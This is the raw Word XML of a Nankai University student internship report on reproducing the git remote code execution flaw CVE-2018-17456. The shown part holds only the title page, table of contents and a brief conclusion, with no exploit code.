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cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>南开大学</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实习实训</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w: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0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="0" w:firstLineChars="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/>
    <w:p/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480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:id w:val="147463564"/>
        <w15:color w:val="DBDBDB"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              <w:sz w:val="21"/>
            </w:rPr>
            <w:t>目录</w:t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 w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc28487 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>1.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>结论（</w:t>
          </w:r>
          <w:r>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28487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 w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36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_Toc7481 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>1.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>风险等级分布</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7481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_Toc24528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/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>工作</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>计划（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24528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_Toc13939 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>工作</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>人员</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13939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_Toc3137 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>对象</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3137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_Toc7909 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>阶段</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7909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_Toc1860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2.4风险等级</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1860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_Toc6133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/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>过程（</w:t>
          </w:r>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>5分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6133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_Toc18532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3.1 风险管理及规避</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18532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_Toc4033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3.</w:t>
          </w:r>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试方法</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4033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_Toc28445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3.</w:t>
          </w:r>
          <w:r>
            <w:t>3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试中所用的工具</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28445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_Toc12892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 xml:space="preserve">4. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>结果（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12892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_Toc32666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4.1 POC插件编写</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32666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_Toc25120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4.2 漏洞信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25120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>
          <w:pPr>
            <w:bidi w:val="0"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:sectPr>
          <w:headerReference r:id="rId3" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992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425" w:num="1"/>
          <w:docGrid w:type="lines" w:linePitch="312" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>南开大学实习实训第十一小组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全人员采用科学的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>于2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>git远程代码执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts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</w:pP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本次共发现漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个，其高危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个，中危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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个,低危漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>个。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="1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5"/>
        <w:gridCol w:w="4714"/>
        <w:gridCol w:w="22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1595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars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bookmarkStart w:id="3" w:name="_Hlk482954515"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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cs="宋体"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1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  <w:t>风险值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3" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="17"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia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git远程命令执行漏洞(CVE-2018-17456)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体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CVSS 3.x: 9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="5" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="6" w:name="_Toc7481"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="172339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717040"/>
            <wp:effectExtent l="0" t="0" r="14605" b="508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1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312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="8" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="9" w:name="_Toc24528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc13939"/>
      <w:bookmarkStart w:id="11" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="12" w:name="_Toc10156"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工作</w:t>
